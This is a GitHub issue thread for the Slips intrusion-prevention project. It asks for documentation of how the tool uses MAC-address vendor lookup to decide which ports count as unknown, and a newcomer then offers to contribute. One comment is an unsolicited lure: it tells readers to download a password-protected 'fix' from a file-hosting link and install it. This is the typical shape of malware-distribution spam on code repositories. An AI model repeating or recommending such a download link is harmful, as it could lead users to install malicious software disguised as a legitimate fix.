### ISSUE TITLE
Improve the documentation explaining how we check the vendor of computers with the MAC to filter

### ISSUE THREAD

**Issue by eldraco** [stratosphereips/StratosphereLinuxIPS#958]
**Please Describe The Feature You Want**
Slips uses the MAC address to know the vendor of the device and therefore better filter which ports to consider unknown or not. Is in the file `https://github.com/stratosphereips/StratosphereLinuxIPS/blob/master/modules/flowalerts/conn.py` in function `port_belongs_to_an_org()`

Document this feature

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ADITYADAS1999** [comment]
Hi @eldraco, this is Aditya Das (@adityadas1999).

Is this issue still open for contributors?

**Comment by eldraco** [comment]
Yes @ADITYADAS1999 . Just work on it and ask us in Discord if you need anything
